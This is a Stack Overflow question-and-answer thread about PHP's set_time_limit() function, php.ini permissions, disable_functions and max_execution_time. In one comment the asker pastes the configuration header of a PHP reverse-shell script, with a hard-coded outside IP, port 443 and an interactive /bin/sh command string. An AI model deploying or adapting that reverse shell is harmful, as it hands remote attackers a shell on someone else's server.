0

I have 3 Questions about set_time_limit() function in PHP :

  1. when a user doesn't have permission to access PHP.ini can he change the value of the set_time_limit() function ?
  2. what can I do to stop restarting set_time_limit() function ?
  3. other way: I don't want to run set_time_limit(). What can I do?
user3788648
  • 31
  • 2
  • 9
  • i diddn't understand your mean ! if i talk bad sry my English is not good ! – user3788648 Jun 29 '14 at 23:38
  • 1
    He's talking about the ALL CAPS you had in the question. On the Internet, that's shouting. – Barmar Jun 29 '14 at 23:39
  • 1: Yes, the user can use set_time_limit() unless PHP is running in safe mode. 2/3: Are you running a server and you want to prevent other users from overriding the timeout? If so, you can use the disabled_functions directive in php.ini to turn set_time_limit off. That way, users won't be able to call that function. – shaunc Jun 29 '14 at 23:40
  • @shaunc If you're going to answer the question, post it as an answer, not a comment. – Barmar Jun 29 '14 at 23:40

2 Answers2

1

Your three questions is easily answered by the PHP Manual - set_time_limit function of set_time_limit function.

1 - A user only don't have permissions to change the php.ini when it doesn't have the permissions to do so through the file system

2 and 3 - You can change the max_execution_time on php.ini if you have the right permissions. Put on it a huge value (it is not recommended though)

Jorge Campos
  • 22,647
  • 7
  • 56
  • 87
1

To 1:

Yes a user may call the function even if they don't have access to the php.ini. You may use safe_mode(DEPRECATED and REMOVED in 5.4) or the disabled_functions ini directive to avoid this. However, set_time_limit is potentional misleading (read below). If you don't want to change the php.ini it might in a web context be possible to set the max response-time at the server level or the used cgi config.

To 2 also answers 3: Disallow the function and/or set max_execution_time.

Note: set_time_limit counts the execution time of the current running php script, not the time the script spends waiting on external ressources (Exception ofcourse on windows).

Rangad
  • 2,110
  • 23
  • 29
  • Thank You for your answer :x the first guy (in up) said that we have not access to php.ini so we cannot change that ! but i didn't get your answer for question one completely ! how can i don't allow the user to change the value ? – user3788648 Jun 29 '14 at 23:49
  • and in answer to question 2 and 3 if i put a huge number in the value it won't be a problem ? or i can use anything else ? and what's max_execution? how can use it ? thanks a lot :X – user3788648 Jun 29 '14 at 23:50
  • If you are in control of the server you can disable certain functions in the php.ini. Access to the php.ini is based on plain file-system permissions. However, there are many php.ini options that may be set on runtime (List [here](http://www.php.net/manual/en/ini.list.php)). `max_execution_time` is the php.ini counterpart of `set_time_limit()`. Setting `max_execution_time`to a high value is usually not a problem as apache/iis will abort long running requests. – Rangad Jun 29 '14 at 23:57
  • thanks ! I've got It ! :x i have another question ! you said that we can change the set_time_limit() in php.ini . look at this script : set_time_limit (0); $VERSION = "1.0"; $ip = '151.233.143.114'; // CHANGE THIS $port = 443; // CHANGE THIS $chunk_size = 1400; $write_a = null; $error_a = null; $shell = 'uname -a; w; id; /bin/sh -i'; $daemon = 0; $debug = 0; no php.ini is here ! what anout this ? Thanks alot :x – user3788648 Jun 30 '14 at 00:05
  • There is likely a php.ini involved somewhere. See the results of `phpinfo()` to locate it. Anyway if you have a question unreleated to this one you should ask a new one, if that would not be a duplicate. A way to find it is already **[here](http://stackoverflow.com/a/17850805/2912456)** – Rangad Jun 30 '14 at 00:18
  • so so so thanks :X just this i'm gonna go just this please ! my php.ini is here : /etc/php.ini . what version does the set_time_limit() work on it that user can change that ? OR what version of php user can change the value of set_time_limit() ? thanks a lot lot lot :D :X – user3788648 Jun 30 '14 at 00:34